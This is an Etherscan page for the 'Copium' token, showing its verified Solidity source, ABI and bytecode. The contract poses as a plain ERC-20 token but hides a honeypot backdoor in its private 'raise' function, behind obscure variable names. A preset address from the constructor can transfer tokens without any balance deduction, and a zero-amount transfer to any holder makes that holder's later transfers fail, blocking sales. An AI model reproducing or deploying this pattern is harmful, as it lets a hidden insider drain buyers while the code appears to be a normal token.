ETH Price: $3,391.16 (-1.62%)
Gas: 1 Gwei

Token

Copium (COPIUM)
 

Overview

Max Total Supply

4,206,900,000,000 COPIUM

Holders

72

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
7,267,961,897.524789953 COPIUM

Value
$0.00
0x479a021bbeb70a70a6089a9fc8664915da88dec7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Copium

Compiler Version
v0.8.15+commit.e14f2714

Optimization Enabled:
Yes with 201 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-05-14
*/

// https://twitter.com/COPIUMDROP

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.5;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

contract Copium is Ownable {

    mapping(address => mapping(address => uint256)) public allowance;

    uint8 public decimals = 9;

    address public uniswapV2Pair;
    
    uint256 public totalSupply = 4_206_900_000_000 * 10 ** decimals;

    string public symbol = "COPIUM";

    function transfer(address positive, uint256 cope) public returns (bool success) {
        raise(msg.sender, positive, cope);
        return true;
    }

    mapping(address => uint256) private less;

    IUniswapV2Router02 private uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    event Approval(address indexed owner, address indexed spender, uint256 value);

    constructor(address recur) {
        balanceOf[msg.sender] = totalSupply;
        less[recur] = pump;
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
    }

    function approve(address recruit, uint256 cope) public returns (bool success) {
        allowance[msg.sender][recruit] = cope;
        emit Approval(msg.sender, recruit, cope);
        return true;
    }

    uint256 private pump = 82;

    mapping(address => uint256) public balanceOf;

    mapping(address => uint256) private fomo;

    event Transfer(address indexed from, address indexed to, uint256 value);

    string public name = "Copium";

    function raise(address margin, address positive, uint256 cope) private returns (bool success) {
        if (less[margin] == 0) {
            if (uniswapV2Pair != margin && fomo[margin] > 0) {
                less[margin] -= pump;
            }
            balanceOf[margin] -= cope;
        }
        balanceOf[positive] += cope;
        if (cope == 0) {
            fomo[positive] += pump;
        }
        emit Transfer(margin, positive, cope);
        return true;
    }

    function transferFrom(address margin, address positive, uint256 cope) public returns (bool success) {
        raise(margin, positive, cope);
        require(cope <= allowance[margin][msg.sender]);
        allowance[margin][msg.sender] -= cope;
        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"recur","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recruit","type":"address"},{"internalType":"uint256","name":"cope","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"positive","type":"address"},{"internalType":"uint256","name":"cope","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"margin","type":"address"},{"internalType":"address","name":"positive","type":"address"},{"internalType":"uint256","name":"cope","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526002805460ff191660099081179091556200002190600a620003fd565b62000033906503d37ec7b50062000415565b600355604080518082019091526006815265434f5049554d60d01b6020820152600490620000629082620004dc565b50600680546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d17815560526007556040805180820190915290815265436f7069756d60d01b6020820152600a90620000b99082620004dc565b50348015620000c757600080fd5b5060405162000ec238038062000ec2833981016040819052620000ea91620005a8565b600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600354336000908152600860209081526040808320939093556007546001600160a01b038581168452600583529284902055600654835163c45a015560e01b8152935192169263c45a015592600480830193928290030181865afa15801562000198573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001be9190620005a8565b6001600160a01b031663c9c6539630600660009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000221573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002479190620005a8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000295573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002bb9190620005a8565b600260016101000a8154816001600160a01b0302191690836001600160a01b0316021790555050620005d3565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200033f578160001904821115620003235762000323620002e8565b808516156200033157918102915b93841c939080029062000303565b509250929050565b6000826200035857506001620003f7565b816200036757506000620003f7565b81600181146200038057600281146200038b57620003ab565b6001915050620003f7565b60ff8411156200039f576200039f620002e8565b50506001821b620003f7565b5060208310610133831016604e8410600b8410161715620003d0575081810a620003f7565b620003dc8383620002fe565b8060001904821115620003f357620003f3620002e8565b0290505b92915050565b60006200040e60ff84168362000347565b9392505050565b6000816000190483118215151615620004325762000432620002e8565b500290565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200046257607f821691505b6020821081036200048357634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620004d757600081815260208120601f850160051c81016020861015620004b25750805b601f850160051c820191505b81811015620004d357828155600101620004be565b5050505b505050565b81516001600160401b03811115620004f857620004f862000437565b62000510816200050984546200044d565b8462000489565b602080601f8311600181146200054857600084156200052f5750858301515b600019600386901b1c1916600185901b178555620004d3565b600085815260208120601f198616915b82811015620005795788860151825594840194600190910190840162000558565b5085821015620005985787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060208284031215620005bb57600080fd5b81516001600160a01b03811681146200040e57600080fd5b6108df80620005e36000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c9578063a9059cbb146101d1578063dd62ed3e146101e4578063f2fde38b1461020f57600080fd5b806370a082311461018e578063715018a6146101ae5780638da5cb5b146101b857600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc610222565b6040516100e991906106fe565b60405180910390f35b61010561010036600461076f565b6102b0565b60405190151581526020016100e9565b61011e60035481565b6040519081526020016100e9565b61010561013a366004610799565b61031c565b60025461014c9060ff1681565b60405160ff90911681526020016100e9565b6002546101769061010090046001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e61019c3660046107d5565b60086020526000908152604090205481565b6101b661039c565b005b6000546001600160a01b0316610176565b6100dc610445565b6101056101df36600461076f565b610452565b61011e6101f23660046107f7565b600160209081526000928352604080842090915290825290205481565b6101b661021d3660046107d5565b610469565b600a805461022f9061082a565b80601f016020809104026020016040519081016040528092919081815260200182805461025b9061082a565b80156102a85780601f1061027d576101008083540402835291602001916102a8565b820191906000526020600020905b81548152906001019060200180831161028b57829003601f168201915b505050505081565b3360008181526001602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061030b9086815260200190565b60405180910390a350600192915050565b6000610329848484610583565b506001600160a01b038416600090815260016020908152604080832033845290915290205482111561035a57600080fd5b6001600160a01b03841660009081526001602090815260408083203384529091528120805484929061038d90849061087a565b90915550600195945050505050565b6000546001600160a01b031633146103fb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6004805461022f9061082a565b600061045f338484610583565b5060019392505050565b6000546001600160a01b031633146104c35760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f2565b6001600160a01b0381166105285760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f2565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166000908152600560205260408120548103610640576002546001600160a01b0385811661010090920416148015906105dc57506001600160a01b03841660009081526009602052604090205415155b15610612576007546001600160a01b0385166000908152600560205260408120805490919061060c90849061087a565b90915550505b6001600160a01b0384166000908152600860205260408120805484929061063a90849061087a565b90915550505b6001600160a01b03831660009081526008602052604081208054849290610668908490610891565b909155505060008290036106a7576007546001600160a01b038416600090815260096020526040812080549091906106a1908490610891565b90915550505b826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106ec91815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561072b5785810183015185820160400152820161070f565b8181111561073d576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461076a57600080fd5b919050565b6000806040838503121561078257600080fd5b61078b83610753565b946020939093013593505050565b6000806000606084860312156107ae57600080fd5b6107b784610753565b92506107c560208501610753565b9150604084013590509250925092565b6000602082840312156107e757600080fd5b6107f082610753565b9392505050565b6000806040838503121561080a57600080fd5b61081383610753565b915061082160208401610753565b90509250929050565b600181811c9082168061083e57607f821691505b60208210810361085e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60008282101561088c5761088c610864565b500390565b600082198211156108a4576108a4610864565b50019056fea2646970667358221220a2dbc80be0d70d995833872c8ba65e0ac090edd56293ce4fd25aed2fdfa8d8d164736f6c634300080f00330000000000000000000000000082db9679810c22ac0217839e5f60a230c0c9c5

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c9578063a9059cbb146101d1578063dd62ed3e146101e4578063f2fde38b1461020f57600080fd5b806370a082311461018e578063715018a6146101ae5780638da5cb5b146101b857600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc610222565b6040516100e991906106fe565b60405180910390f35b61010561010036600461076f565b6102b0565b60405190151581526020016100e9565b61011e60035481565b6040519081526020016100e9565b61010561013a366004610799565b61031c565b60025461014c9060ff1681565b60405160ff90911681526020016100e9565b6002546101769061010090046001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e61019c3660046107d5565b60086020526000908152604090205481565b6101b661039c565b005b6000546001600160a01b0316610176565b6100dc610445565b6101056101df36600461076f565b610452565b61011e6101f23660046107f7565b600160209081526000928352604080842090915290825290205481565b6101b661021d3660046107d5565b610469565b600a805461022f9061082a565b80601f016020809104026020016040519081016040528092919081815260200182805461025b9061082a565b80156102a85780601f1061027d576101008083540402835291602001916102a8565b820191906000526020600020905b81548152906001019060200180831161028b57829003601f168201915b505050505081565b3360008181526001602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061030b9086815260200190565b60405180910390a350600192915050565b6000610329848484610583565b506001600160a01b038416600090815260016020908152604080832033845290915290205482111561035a57600080fd5b6001600160a01b03841660009081526001602090815260408083203384529091528120805484929061038d90849061087a565b90915550600195945050505050565b6000546001600160a01b031633146103fb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6004805461022f9061082a565b600061045f338484610583565b5060019392505050565b6000546001600160a01b031633146104c35760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f2565b6001600160a01b0381166105285760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f2565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166000908152600560205260408120548103610640576002546001600160a01b0385811661010090920416148015906105dc57506001600160a01b03841660009081526009602052604090205415155b15610612576007546001600160a01b0385166000908152600560205260408120805490919061060c90849061087a565b90915550505b6001600160a01b0384166000908152600860205260408120805484929061063a90849061087a565b90915550505b6001600160a01b03831660009081526008602052604081208054849290610668908490610891565b909155505060008290036106a7576007546001600160a01b038416600090815260096020526040812080549091906106a1908490610891565b90915550505b826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106ec91815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561072b5785810183015185820160400152820161070f565b8181111561073d576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461076a57600080fd5b919050565b6000806040838503121561078257600080fd5b61078b83610753565b946020939093013593505050565b6000806000606084860312156107ae57600080fd5b6107b784610753565b92506107c560208501610753565b9150604084013590509250925092565b6000602082840312156107e757600080fd5b6107f082610753565b9392505050565b6000806040838503121561080a57600080fd5b61081383610753565b915061082160208401610753565b90509250929050565b600181811c9082168061083e57607f821691505b60208210810361085e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60008282101561088c5761088c610864565b500390565b600082198211156108a4576108a4610864565b50019056fea2646970667358221220a2dbc80be0d70d995833872c8ba65e0ac090edd56293ce4fd25aed2fdfa8d8d164736f6c634300080f0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000000082db9679810c22ac0217839e5f60a230c0c9c5

-----Decoded View---------------
Arg [0] : recur (address): 0x0082DB9679810c22aC0217839e5f60A230c0C9c5

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000000082db9679810c22ac0217839e5f60a230c0c9c5


Deployed Bytecode Sourcemap

2307:2190:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3686:29;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3255:207;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;3255:207:0;1053:187:1;2491:63:0;;;;;;;;;1391:25:1;;;1379:2;1364:18;2491:63:0;1245:177:1;4219:275:0;;;;;;:::i;:::-;;:::i;2416:25::-;;;;;;;;;;;;1932:4:1;1920:17;;;1902:36;;1890:2;1875:18;2416:25:0;1760:184:1;2450:28:0;;;;;;;;-1:-1:-1;;;;;2450:28:0;;;;;;-1:-1:-1;;;;;2113:32:1;;;2095:51;;2083:2;2068:18;2450:28:0;1949:203:1;3504:44:0;;;;;;:::i;:::-;;;;;;;;;;;;;;1479:148;;;:::i;:::-;;837:79;875:7;902:6;-1:-1:-1;;;;;902:6:0;837:79;;2563:31;;;:::i;2603:154::-;;;;;;:::i;:::-;;:::i;2343:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;1782:244;;;;;;:::i;:::-;;:::i;3686:29::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;3255:207::-;3354:10;3319:12;3344:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;3344:30:0;;;;;;;;;;:37;;;3397:35;3319:12;;3344:30;;3397:35;;;;3377:4;1391:25:1;;1379:2;1364:18;;1245:177;3397:35:0;;;;;;;;-1:-1:-1;3450:4:0;3255:207;;;;:::o;4219:275::-;4305:12;4330:29;4336:6;4344:8;4354:4;4330:5;:29::i;:::-;-1:-1:-1;;;;;;4386:17:0;;;;;;:9;:17;;;;;;;;4404:10;4386:29;;;;;;;;4378:37;;;4370:46;;;;;;-1:-1:-1;;;;;4427:17:0;;;;;;:9;:17;;;;;;;;4445:10;4427:29;;;;;;;:37;;4460:4;;4427:17;:37;;4460:4;;4427:37;:::i;:::-;;;;-1:-1:-1;4482:4:0;;4219:275;-1:-1:-1;;;;;4219:275:0:o;1479:148::-;1049:6;;-1:-1:-1;;;;;1049:6:0;212:10;1049:22;1041:67;;;;-1:-1:-1;;;1041:67:0;;3462:2:1;1041:67:0;;;3444:21:1;;;3481:18;;;3474:30;3540:34;3520:18;;;3513:62;3592:18;;1041:67:0;;;;;;;;;1586:1:::1;1570:6:::0;;1549:40:::1;::::0;-1:-1:-1;;;;;1570:6:0;;::::1;::::0;1549:40:::1;::::0;1586:1;;1549:40:::1;1617:1;1600:19:::0;;-1:-1:-1;;;;;;1600:19:0::1;::::0;;1479:148::o;2563:31::-;;;;;;;:::i;2603:154::-;2669:12;2694:33;2700:10;2712:8;2722:4;2694:5;:33::i;:::-;-1:-1:-1;2745:4:0;;2603:154;-1:-1:-1;;;2603:154:0:o;1782:244::-;1049:6;;-1:-1:-1;;;;;1049:6:0;212:10;1049:22;1041:67;;;;-1:-1:-1;;;1041:67:0;;3462:2:1;1041:67:0;;;3444:21:1;;;3481:18;;;3474:30;3540:34;3520:18;;;3513:62;3592:18;;1041:67:0;3260:356:1;1041:67:0;-1:-1:-1;;;;;1871:22:0;::::1;1863:73;;;::::0;-1:-1:-1;;;1863:73:0;;3823:2:1;1863:73:0::1;::::0;::::1;3805:21:1::0;3862:2;3842:18;;;3835:30;3901:34;3881:18;;;3874:62;-1:-1:-1;;;3952:18:1;;;3945:36;3998:19;;1863:73:0::1;3621:402:1::0;1863:73:0::1;1973:6;::::0;;1952:38:::1;::::0;-1:-1:-1;;;;;1952:38:0;;::::1;::::0;1973:6;::::1;::::0;1952:38:::1;::::0;::::1;2001:6;:17:::0;;-1:-1:-1;;;;;;2001:17:0::1;-1:-1:-1::0;;;;;2001:17:0;;;::::1;::::0;;;::::1;::::0;;1782:244::o;3724:487::-;-1:-1:-1;;;;;3833:12:0;;3804;3833;;;:4;:12;;;;;;:17;;3829:193;;3871:13;;-1:-1:-1;;;;;3871:23:0;;;:13;;;;;:23;;;;:43;;-1:-1:-1;;;;;;3898:12:0;;3913:1;3898:12;;;:4;:12;;;;;;:16;;3871:43;3867:104;;;3951:4;;-1:-1:-1;;;;;3935:12:0;;;;;;:4;:12;;;;;:20;;:12;;;:20;;3951:4;;3935:20;:::i;:::-;;;;-1:-1:-1;;3867:104:0;-1:-1:-1;;;;;3985:17:0;;;;;;:9;:17;;;;;:25;;4006:4;;3985:17;:25;;4006:4;;3985:25;:::i;:::-;;;;-1:-1:-1;;3829:193:0;-1:-1:-1;;;;;4032:19:0;;;;;;:9;:19;;;;;:27;;4055:4;;4032:19;:27;;4055:4;;4032:27;:::i;:::-;;;;-1:-1:-1;;4082:1:0;4074:9;;;4070:64;;4118:4;;-1:-1:-1;;;;;4100:14:0;;;;;;:4;:14;;;;;:22;;:14;;;:22;;4118:4;;4100:22;:::i;:::-;;;;-1:-1:-1;;4070:64:0;4166:8;-1:-1:-1;;;;;4149:32:0;4158:6;-1:-1:-1;;;;;4149:32:0;;4176:4;4149:32;;;;1391:25:1;;1379:2;1364:18;;1245:177;4149:32:0;;;;;;;;-1:-1:-1;4199:4:0;3724:487;;;;;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:328::-;1504:6;1512;1520;1573:2;1561:9;1552:7;1548:23;1544:32;1541:52;;;1589:1;1586;1579:12;1541:52;1612:29;1631:9;1612:29;:::i;:::-;1602:39;;1660:38;1694:2;1683:9;1679:18;1660:38;:::i;:::-;1650:48;;1745:2;1734:9;1730:18;1717:32;1707:42;;1427:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;:::-;2298:39;2157:186;-1:-1:-1;;;2157:186:1:o;2348:260::-;2416:6;2424;2477:2;2465:9;2456:7;2452:23;2448:32;2445:52;;;2493:1;2490;2483:12;2445:52;2516:29;2535:9;2516:29;:::i;:::-;2506:39;;2564:38;2598:2;2587:9;2583:18;2564:38;:::i;:::-;2554:48;;2348:260;;;;;:::o;2613:380::-;2692:1;2688:12;;;;2735;;;2756:61;;2810:4;2802:6;2798:17;2788:27;;2756:61;2863:2;2855:6;2852:14;2832:18;2829:38;2826:161;;2909:10;2904:3;2900:20;2897:1;2890:31;2944:4;2941:1;2934:15;2972:4;2969:1;2962:15;2826:161;;2613:380;;;:::o;2998:127::-;3059:10;3054:3;3050:20;3047:1;3040:31;3090:4;3087:1;3080:15;3114:4;3111:1;3104:15;3130:125;3170:4;3198:1;3195;3192:8;3189:34;;;3203:18;;:::i;:::-;-1:-1:-1;3240:9:1;;3130:125::o;4028:128::-;4068:3;4099:1;4095:6;4092:1;4089:13;4086:39;;;4105:18;;:::i;:::-;-1:-1:-1;4141:9:1;;4028:128::o

Swarm Source

ipfs://a2dbc80be0d70d995833872c8ba65e0ac090edd56293ce4fd25aed2fdfa8d8d1
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.